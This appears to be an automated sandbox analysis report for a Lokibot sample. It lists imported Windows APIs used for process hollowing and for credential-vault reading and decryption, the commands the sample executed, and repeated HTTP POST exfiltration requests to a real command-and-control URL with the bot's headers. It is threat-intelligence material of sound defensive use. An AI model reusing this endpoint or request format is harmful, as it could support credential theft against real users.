ntdll.dll.NtProtectVirtualMemory kernel32.dll.VirtualAllocEx kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext ntdll.dll.NtUnmapViewOfSection kernel32.dll.ResumeThread kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.WriteProcessMemory kernel32.dll.ReadProcessMemory kernel32.dll.TerminateProcess kernel32.dll.CreateProcessW ole32.dll.CoUninitialize kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash cryptsp.dll.CryptReleaseContext vaultcli.dll.VaultEnumerateItems vaultcli.dll.VaultEnumerateVaults vaultcli.dll.VaultFree vaultcli.dll.VaultGetItem vaultcli.dll.VaultOpenVault vaultcli.dll.VaultCloseVault sechost.dll.LookupAccountSidLocalW netapi32.dll.NetUserGetInfo cryptsp.dll.CryptImportKey cryptsp.dll.CryptSetKeyParam cryptsp.dll.CryptDecrypt cryptsp.dll.CryptDestroyKey ole32.dll.CoInitializeSecurity sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW ole32.dll.CoCreateInstance kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle fntcache.dll.ServiceMain fntcache.dll.SvchostPushServiceGlobals ntmarta.dll.GetMartaExtensionInterface uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware dwmapi.dll.DwmIsCompositionEnabled rpcrt4.dll.UuidFromStringW radarrs.dll.WdiDiagnosticModuleMain radarrs.dll.WdiHandleInstance radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion wkscli.dll.NetGetJoinInformation netutils.dll.NetApiBufferFree dfdts.dll.DfdGetDefaultPolicyAndSMART
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\212121212112.exe" C:\Windows\system32\lsass.exe C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation C:\Windows\system32\sc.exe start w32time task_started C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Started Services
VaultSvc W32Time
Created Services
Nothing to display
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:38:39 | 2018-09-09 19:42:07 | 208 |
2 HTTP Request(s) detected
http://89.187.86.7/~blackdia/new/mhoney/fre.php
- Hostname: 89.187.86.7
- IP Address:
- Port: 80
- Count: 2
POST /~blackdia/new/mhoney/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 89.187.86.7 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CBF30E94 Content-Length: 192 Connection: close
http://89.187.86.7/~blackdia/new/mhoney/fre.php
- Hostname: 89.187.86.7
- IP Address:
- Port: 80
- Count: 11
POST /~blackdia/new/mhoney/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 89.187.86.7 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CBF30E94 Content-Length: 165 Connection: close
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:38:39 | 2018-09-09 19:42:07 | 208 |
1 Host(s) detected
| IP Address | Hostname | Reverse DNS |
|---|---|---|
89.187.86.7  |
vulcan.hostingseries.net. |
Host(s) by Country
| Hosts | Country 1 |
|---|---|
| 1 | United Kingdom |
Detected family: #Lokibot
TheSystem Itself @ 2018-09-09 19:58:04
#infosec #automation
TheSystem Itself @ 2018-09-09 19:42:30